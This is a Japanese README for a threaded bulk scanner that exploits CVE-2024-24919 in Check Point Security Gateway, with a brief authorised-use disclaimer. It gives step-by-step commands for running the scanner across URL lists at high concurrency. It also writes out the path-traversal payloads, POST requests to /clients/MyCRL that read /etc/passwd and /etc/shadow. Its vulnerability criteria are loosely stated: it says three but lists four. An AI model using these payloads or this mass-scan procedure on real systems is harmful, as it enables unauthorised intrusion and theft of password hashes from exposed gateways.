
CVE-2024-24919 [Check Point Security Gateway 情報漏えい]
このスクリプトは以下に基づいており、クレジットは以下に帰属します: https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
このPythonスクリプトは、特定のPOSTリクエストを送信し、レスポンスヘッダーとステータスコードをチェックすることで、URLのリストに対してCVE-2024-24919の脆弱性をスキャンします。リクエストとレスポンスの詳細をログに記録し、事前定義された基準に基づいて脆弱なURLを特定します。

[!WARNING] 企業環境での教育およびテスト目的のみを対象としています。 https://x.com/__nav1n_/ https://github.com/ifconfig-me は本コードについて一切の責任を負いません。自己責任で使用してください。 許可なく対象に攻撃を行わないでください。
[!NOTE] スレッド処理: 新しいv2バージョンはスレッド処理に対応しました。このスクリプトは50スレッドを作成してURLを並行処理し、スキャンを高速化します。このスレッド数は
-t100 で制御できます。 キュー: キューを使用してURLを管理し、ワーカースレッドに配布します。 進捗と結果: スクリプトは色付き出力で進捗と結果を表示します。
requests ライブラリtermcolor ライブラリリポジトリをクローンします:
git clone https://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner.git
cd CVE-2024-24919-Bulk-Scanner
必要なライブラリをインストールします:
pip install requests termcolor
URLのリストを含むファイルを準備します:
1行に1つのURLを記載したテキストファイル(例: urls.txt)を作成します。各URLが https:// で始まることを確認してください。例:
https://example.com
https://testsite.com
https://vulnerable.com
https://123.456.789.10:8080
スクリプトを実行します:
python CVE-2024-24919-auto-v2.py -t 150 -f urls.txt
出力を確認します:
スクリプトは、スキャンの進捗と結果をターミナルに表示します。脆弱なURLは Vulnerable URL found: というメッセージで識別されます。
結果:
request-analyze.txt と request-analyze-v2.txt に保存されます。checkpoint-results.txt と checkpoint-results-v2.txt に保存されます。スクリプトは、各URLの /clients/MyCRL エンドポイントに2つのペイロードを含むPOSTリクエストを送信します:
aCSHELL/../../../../../../../etc/passwdaCSHELL/../../../../../../../etc/shadowレスポンスヘッダーを以下の基準でチェックします:
Server: Check Point SVN foundationX-UA-Compatible: IE=EmulateIE7X-Frame-Options: SAMEORIGINHTTP/1.0 200 OKレスポンスが上記の3つの基準のいずれかに一致する場合、そのURLは脆弱とみなされます。
